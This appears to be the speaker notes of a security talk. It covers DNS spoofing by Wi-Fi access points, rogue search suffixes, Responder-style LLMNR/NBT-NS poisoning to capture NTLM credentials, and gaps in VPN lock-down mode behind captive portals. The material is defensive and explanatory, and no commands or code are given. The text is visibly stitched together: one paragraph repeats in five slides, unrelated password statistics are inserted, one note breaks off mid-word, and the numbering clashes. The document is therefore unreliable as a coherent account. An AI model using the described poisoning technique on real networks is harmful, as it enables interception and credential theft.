20% are still vulnerable to all the bugs and exploits publicly disclosed since September 2017.
  2. So this is basically how it works – it’s a very practical and simple variant of a DNS spoofing ‘attack’, trivial to execute by anyone who owns or controls the Wifi AP, whether deliberately or by accident: Victim gets IP configuration detail assigned by the Wifi API, including DNS server & domain search suffix Client requests the IP address of a site or server by name The response comes from the DNS server assigned by the Wifi API. Or alternatively the search domain which results in the DNS query comes from the Wifi API. Either way, the Wifi API controls DNS, which directs all connectivity Therefore any TCP connection can be redirected to a potentially malicious server by the access point manipulating the DNS responses. That malicious server could be on the Internet (as with the case we originally investigated) or could be located on the LAN, or even on the AP itself. A classic and simple way to exploit this systemic vulnerability is via a SMB ‘responder’ attack
  3. We started to test the behaviour on other networks we use … and immediately spot exactly the same behaviour. This time there is no DNS wildcard so there is no immediate risk, but the fundamental condition is the same – DNS requests for unqualified host names with domain search suffices defined by the Wifi AP appended.
  4. Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. This tool is first an LLMNR and NBT-NS responder, it will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don’t break legitimate NBT-NS behavior. You can set the -r option to 1 via command line if you want this tool to answer to the Workstation Service request name suffix.
  5. There are many ways in which we mitigate against a ‘responder’ class of threat, including personal firewalls and EDP/R systems (which is what ultimately saved SecureData) but the primary defensive mechanism when using untrusted networks is the VPN. The basic principle is that the VPN encrypts and tunnels all outbound traffic as it leaves the client and ‘drops’ it in a safe location (e.g. in the corporate network). A virtual network device is created on the client where trusted DNS servers can be configured. This protects against a rogue DNS server whilst also protecting the privacy of data traversing the network. * Not sure whether this mitigates against rogue DNS search suffices – IT DOESN’T
  6. But here’s the thing. I spend much of life travelling and I’m therefore almost always of 3rd party Wifi networks. We have numerous corporate VPN solutions to cater for this that provide access control and confidentiality.
  7. But I get to wondering … what about this? When I need to interact with a captive portal of some kind I am connected to the Wifi network but not to the Internet. The VPN tunnel can’t established and so it can’t offer me any protection. I’m vulnerable to both DNS and network Attacker in the Middle risks.
  8. With a captive portal in play I remain ‘trapped’ on the Wifi LAN until I’ve finished interacting the portal. Until that’s done and I (hopefully) have full internet access I am vulnerable to both DNS and network manipulation of my traffic, plus snooping of any network traffic my device emits.
  9. This interaction captures that state. The OS and various applications all try determine whether they have internet access by connecting to known internet resources, as long as they receive the redirect to a another site the machine knows that its connected to the WLAN, but not to the Internet.
  10. This is how it looks when internet connectivity is established. Instead of a 302 we get a 200 with the content that should be d
  11. Here’s an example of a very simple and innocent privacy violation – the domain name of my machine plus any other machine account information being broadcast onto the local network for anyone to see. My VPN connection is not yet established, so it doesn’t prevent this
  12. Because all my traffic outbound traffic is being ‘captured’ by the captive portal behaviour, any applications attempting to connected outward and deploying SSL/TLS report security exceptions. The server they are communicating with on the network cannot (theoretically at least) present the expected cryptographic certificate and therefore they either warn me, prompt me or simply fail
  13. The same is true when I’m using a mobile phone.
  14. So at this point the only thing protecting my traffic and defending me from attacker-in-the-middle and credential stealing attacks launched on the internal network via the wifi AP or the captive portal is the enforcement of SSL / TLS by the individual pages or apps on the mobile. The problem is … these are completely beyond our control.
  15. Here are some examples of services that would behave like this. One can see cloud services, enterprise internet services and internal services all being requested. The response to those requests at this point is fully under the control of the Wifi AP.
  16. One response to mitigating this threat is via the use of VPN ‘lock down’ or ‘Captive Portal Mitigation’, which is available in many VPN products. The idea is that the VPN blocks all outbound connections and then uses its own built-in browser to negotiate the captive portal until Internet connectivity can be established and the VPN built. https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB40363 https://docs.pulsesecure.net/WebHelp/PDC/9.0R1/Content/PDC_AdminGuide_9.0R1/Captive_Portal_Remediation.htm Lock-down mode prevents external browsers from communicating before the VPN is established, so external browsers cannot be used for captive-portal remediation with lock-down mode enabled. The embedded browser is the only option for remediating a captive portal in lock-down mode.
  17. Here we see the Lock Down in action. Notice how the outbound ping is blocked until after the portal is negotiated and the VPN established
  18. Problem is – DNS traffic is still allowed. And that’s not all.
  19. https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB40363 https://docs.pulsesecure.net/WebHelp/PDC/9.0R1/Content/PDC_AdminGuide_9.0R1/Captive_Portal_Remediation.htm It seems lock-down mode is designed to block 'traditional' outbound internet connections, but not a lot of discovery stuff (like DNS and MDNS) or 'internal' stuff like SMB. In other words … Responder type attacks are *still* possible, even with ‘Lock Down’ mode enabled. Lock-down mode prevents external browsers from communicating before the VPN is established, so external browsers cannot be used for captive-portal remediation with lock-down mode enabled. The embedded browser is the only option for remediating a captive portal in lock-down mode.
  20. Activating a mapped drive initiates the SMB connection we see below. Note that the malicious Responder server is located interal to the LAN in this case.
  21. There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place. Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved. We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
  22. Scarily – even after the VPN is established – if the DNS search suffix is not specifically configured – DNS search suffices can still be used to poison DNS requests, direct them at malicious name servers and resolve valuable internal resources to malicious hosts for responder or other AiTM attacks
  23. There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place. Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved. We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
  24. There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place. Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved. We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
  25. Normalised – to remove double audits.
  26. Only lowercase alpha = 2194 (0.48%) Only uppercase alpha = 41 (0.01%) Only alpha = 2235 (0.49%) Only numeric = 301 (0.07%) First capital last symbol = 47341 (10.43%) First capital last number = 259236 (57.1%)
  27. There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place. Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved. We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
  28. There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place. Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved. We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
  29. https://beyondcorp.com/ When a highly sophisticated APT attack named Operation Aurora occurred in 2009, Google began an internal initiative to reimagine their security architecture with regards to how employees and devices access internal applications.
  30. https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43231.pdf
  31. 16. These are the key elements of self-knowledge we believe on should seek to achieve. Each of these conveniently map to a specific practice the security team can undertake: Identify and Authentication Footprinting Threat Modeling Vulnerability Discovery Objective-based penetration testing or red / purple teaming Honeypots, tokens and other traps Detection and Threat Hunting Response, documented and regularly practiced.